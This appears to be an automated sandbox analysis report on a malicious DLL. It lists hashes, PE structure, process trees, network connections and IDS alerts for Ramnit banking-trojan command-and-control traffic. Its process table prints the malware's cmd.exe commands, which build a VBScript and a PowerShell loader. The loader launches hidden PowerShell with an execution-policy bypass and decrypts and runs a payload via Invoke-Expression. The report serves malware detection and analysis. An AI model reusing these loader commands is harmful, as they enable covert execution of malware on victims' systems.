File name: | stage.dll_ |
Full analysis: | https://app.any.run/tasks/1cb0c714-7883-4206-b11c-c239a8776418 |
Verdict: | Malicious activity |
Analysis date: | April 25, 2019, 16:21:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows |
MD5: | 11A03C34C0F45B3B9190751FF17F1594 |
SHA1: | 96EA3A20BE95EB9A22B68AE4D9283AE9E8E93878 |
SHA256: | 8BBE03724EA00DC2B8D6839EF89E14563FEFF6C0C637454F8AEDB6FEAB9DBA16 |
SSDEEP: | 24576:6m6c2sHDAse0IDIMoJiMlRI+02VpFjIBrI1:itsMkjJZRnF0tI1 |
.exe | | | Win32 Executable MS Visual C++ (generic) (42.2) |
---|---|---|
.exe | | | Win64 Executable (generic) (37.3) |
.dll | | | Win32 Dynamic Link Library (generic) (8.8) |
.exe | | | Win32 Executable (generic) (6) |
.exe | | | Generic Win/DOS Executable (2.7) |
Subsystem: | Windows GUI |
---|---|
SubsystemVersion: | 5.1 |
ImageVersion: | - |
OSVersion: | 5.1 |
EntryPoint: | 0x1010 |
UninitializedDataSize: | - |
InitializedDataSize: | 908800 |
CodeSize: | 5632 |
LinkerVersion: | 14 |
PEType: | PE32 |
TimeStamp: | 2019:02:06 12:52:29+01:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 06-Feb-2019 11:52:29 |
Detected languages: |
|
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x000000E0 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 5 |
Time date stamp: | 06-Feb-2019 11:52:29 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x000015A4 | 0x00001600 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.39425 |
.rdata | 0x00003000 | 0x0000098C | 0x00000A00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.63998 |
.data | 0x00004000 | 0x000DCD4C | 0x000DCC00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.48394 |
.rsrc | 0x000E1000 | 0x000001E0 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.72473 |
.reloc | 0x000E2000 | 0x00000230 | 0x00000400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 4.31802 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
2 | 4.91161 | 381 | UNKNOWN | English - United States | RT_MANIFEST |
KERNEL32.dll |
SHLWAPI.dll |
Title | Ordinal | Address |
---|---|---|
getReadyFlag | 1 | 0x00001000 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2680 | "C:\Windows\System32\rundll32.exe" "C:\Users\admin\AppData\Local\Temp\stage.dll_.exe", getReadyFlag | C:\Windows\System32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3324 | "C:\Program Files\Mozilla Firefox\firefox.exe" | C:\Program Files\Mozilla Firefox\firefox.exe | explorer.exe | |
User: admin Company: Mozilla Corporation Integrity Level: MEDIUM Description: Firefox Exit code: 0 Version: 65.0.2 | ||||
1172 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3324.0.561162642\1705982507" -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - "C:\Users\admin\AppData\LocalLow\Mozilla\Temp-{ce348e4c-7d33-445e-89f9-60108c51bcaf}" 3324 "\\.\pipe\gecko-crash-server-pipe.3324" 1140 gpu | C:\Program Files\Mozilla Firefox\firefox.exe | — | firefox.exe |
User: admin Company: Mozilla Corporation Integrity Level: MEDIUM Description: Firefox Exit code: 1 Version: 65.0.2 | ||||
2216 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3324.6.891118953\2101905713" -childID 1 -isForBrowser -prefsHandle 1616 -prefMapHandle 908 -prefsLen 1 -prefMapSize 180950 -schedulerPrefs 0001,2 -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 3324 "\\.\pipe\gecko-crash-server-pipe.3324" 1592 tab | C:\Program Files\Mozilla Firefox\firefox.exe | firefox.exe | |
User: admin Company: Mozilla Corporation Integrity Level: LOW Description: Firefox Exit code: 0 Version: 65.0.2 | ||||
2544 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3324.13.892816589\1354665591" -childID 2 -isForBrowser -prefsHandle 2456 -prefMapHandle 2460 -prefsLen 216 -prefMapSize 180950 -schedulerPrefs 0001,2 -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 3324 "\\.\pipe\gecko-crash-server-pipe.3324" 2472 tab | C:\Program Files\Mozilla Firefox\firefox.exe | firefox.exe | |
User: admin Company: Mozilla Corporation Integrity Level: LOW Description: Firefox Exit code: 0 Version: 65.0.2 | ||||
3816 | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3324.20.35919201\1074680582" -childID 3 -isForBrowser -prefsHandle 3388 -prefMapHandle 3396 -prefsLen 5824 -prefMapSize 180950 -schedulerPrefs 0001,2 -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 3324 "\\.\pipe\gecko-crash-server-pipe.3324" 3340 tab | C:\Program Files\Mozilla Firefox\firefox.exe | firefox.exe | |
User: admin Company: Mozilla Corporation Integrity Level: LOW Description: Firefox Exit code: 0 Version: 65.0.2 | ||||
3460 | cmd.exe /c md C:\Users\admin\AppData\Roaming\mfkrefft | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3912 | cmd.exe /c echo "" > C:\Users\admin\AppData\Roaming\mfkrefft\xkcvomvs.txt | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3032 | cmd.exe /c echo Dim vxJnWNE > C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo Set vxJnWNE = WScript.CreateObject("WScript.Shell") >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo SdpQzFY = vxJnWNE.Environment("PROCESS")("ProgramW6432") = "" >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo lyPLOiq = "" >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo uaCVfgB = "powers" >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo cYpLgCZ = "hell" >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo If SdpQzFY = 0 Then >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo FtBzPdy = vxJnWNE.ExpandEnvironmentStrings("%windir%") >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo lyPLOiq = FtBzPdy + "\SysWOW64\WindowsPowerShell\v1.0\" + uaCVfgB + cYpLgCZ + ".exe" >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo Else >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo lyPLOiq = uaCVfgB + CPNrJLN + cYpLgCZ >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo End If >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo vxJnWNE.Run lyPLOiq + " -WindowStyle Hidden -executionpolicy bypass -File C:\Users\admin\AppData\Roaming\mfkrefft\fqjlmhkk.ps1", 0, True >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs && echo Set vxJnWNE = Nothing >> C:\Users\admin\AppData\Roaming\mfkrefft\crjxxcei.vbs | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3284 | cmd.exe /c echo $eUvkTLk = "C:\Users\admin\AppData\Roaming\mfkrefft\xkcvomvs.txt"; > C:\Users\admin\AppData\Roaming\mfkrefft\fqjlmhkk.ps1 && echo $bYmnlUg = Get-Content $eUvkTLk -Encoding Byte -ReadCount 0; >> C:\Users\admin\AppData\Roaming\mfkrefft\fqjlmhkk.ps1 && echo Add-Type -AssemblyName System.Security >> C:\Users\admin\AppData\Roaming\mfkrefft\fqjlmhkk.ps1 && echo $lKMZfTA = [System.Security.Cryptography.ProtectedData]::Unprotect( >> C:\Users\admin\AppData\Roaming\mfkrefft\fqjlmhkk.ps1 && echo $bYmnlUg, >> C:\Users\admin\AppData\Roaming\mfkrefft\fqjlmhkk.ps1 && echo $null, >> C:\Users\admin\AppData\Roaming\mfkrefft\fqjlmhkk.ps1 && echo [System.Security.Cryptography.DataProtectionScope]::LocalMachine); >> C:\Users\admin\AppData\Roaming\mfkrefft\fqjlmhkk.ps1 && echo $OXzPvyj = [System.Text.Encoding]::ASCII.GetString($lKMZfTA); >> C:\Users\admin\AppData\Roaming\mfkrefft\fqjlmhkk.ps1 && echo Invoke-Expression $OXzPvyj >> C:\Users\admin\AppData\Roaming\mfkrefft\fqjlmhkk.ps1 | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3324 | firefox.exe | C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\scriptCache-current.bin | — | |
MD5:— | SHA256:— | |||
3324 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite-shm | — | |
MD5:— | SHA256:— | |||
3324 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs-1.js | — | |
MD5:— | SHA256:— | |||
3324 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.tmp | — | |
MD5:— | SHA256:— | |||
3324 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm | — | |
MD5:— | SHA256:— | |||
3324 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm | — | |
MD5:— | SHA256:— | |||
3324 | firefox.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js | text | |
MD5:C52C31E2D546FC217645CD7F542CF3E0 | SHA256:73974F60357B038693803F51CA750E9ED609A3376548C88C117FA1FCBB328236 | |||
3324 | firefox.exe | C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\cache2\entries\D821D520CC10102EE7C61B5DC8754996B1293079 | der | |
MD5:F6DE8C031BF52291C6E81843F04F6FFE | SHA256:636E788DA56740CEEE3988B276F0D6EBE1CE6A66DA2FDE47487DCD92CCB3B287 | |||
3324 | firefox.exe | C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\scriptCache-child-current.bin | binary | |
MD5:82F61C08D68502377826CA7EA054CEA7 | SHA256:85801BCE5D7CE3A2ABC14E3208151AC9D324A6EA82FB2ADA1D10BAA8EF58E7DF | |||
3324 | firefox.exe | C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\safebrowsing-updating\block-flashsubdoc-digest256.sbstore | binary | |
MD5:04824A1F92353F43EBB9E7F74B7476FD | SHA256:B48E58EBAB82E4C376F16150A3FFF850C1111FF1F5985D68819CFD6F0DB159D2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3324 | firefox.exe | POST | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/ | US | der | 471 b | whitelisted |
3324 | firefox.exe | POST | 200 | 172.217.21.195:80 | http://ocsp.pki.goog/GTSGIAG3 | US | der | 471 b | whitelisted |
3324 | firefox.exe | POST | 200 | 172.217.21.195:80 | http://ocsp.pki.goog/GTSGIAG3 | US | der | 471 b | whitelisted |
3324 | firefox.exe | POST | 200 | 172.217.21.195:80 | http://ocsp.pki.goog/GTSGIAG3 | US | der | 471 b | whitelisted |
3324 | firefox.exe | POST | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/ | US | der | 471 b | whitelisted |
3324 | firefox.exe | POST | 200 | 172.217.21.195:80 | http://ocsp.pki.goog/GTSGIAG3 | US | der | 471 b | whitelisted |
3324 | firefox.exe | POST | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/ | US | der | 471 b | whitelisted |
3324 | firefox.exe | GET | 200 | 2.16.186.112:80 | http://detectportal.firefox.com/success.txt | unknown | text | 8 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3324 | firefox.exe | 172.217.18.170:443 | safebrowsing.googleapis.com | Google Inc. | US | whitelisted |
3324 | firefox.exe | 35.164.218.3:443 | tiles.services.mozilla.com | Amazon.com, Inc. | US | unknown |
3324 | firefox.exe | 52.10.42.204:443 | search.r53-2.services.mozilla.com | Amazon.com, Inc. | US | unknown |
3324 | firefox.exe | 172.217.21.195:80 | ocsp.pki.goog | Google Inc. | US | whitelisted |
3324 | firefox.exe | 34.223.207.155:443 | www.reddit.com | Amazon.com, Inc. | US | unknown |
3324 | firefox.exe | 54.192.202.20:443 | snippets.cdn.mozilla.net | Amazon.com, Inc. | US | unknown |
3324 | firefox.exe | 2.16.186.112:80 | detectportal.firefox.com | Akamai International B.V. | — | whitelisted |
3324 | firefox.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
3324 | firefox.exe | 172.217.22.46:443 | www.youtube.com | Google Inc. | US | whitelisted |
3324 | firefox.exe | 172.217.16.132:443 | www.google.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
detectportal.firefox.com |
| whitelisted |
search.services.mozilla.com |
| whitelisted |
a1089.dscd.akamai.net |
| whitelisted |
search.r53-2.services.mozilla.com |
| whitelisted |
tiles.services.mozilla.com |
| whitelisted |
snippets.cdn.mozilla.net |
| whitelisted |
tiles.r53-2.services.mozilla.com |
| whitelisted |
drcwo519tnci7.cloudfront.net |
| shared |
ocsp.digicert.com |
| whitelisted |
cs9.wac.phicdn.net |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
2716 | ImagingDevices.exe | A Network Trojan was detected | MALWARE [PTsecurity] Banker Ramnit CnC Connection |
2716 | ImagingDevices.exe | A Network Trojan was detected | MALWARE [PTsecurity] Banker Ramnit CnC Connection |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|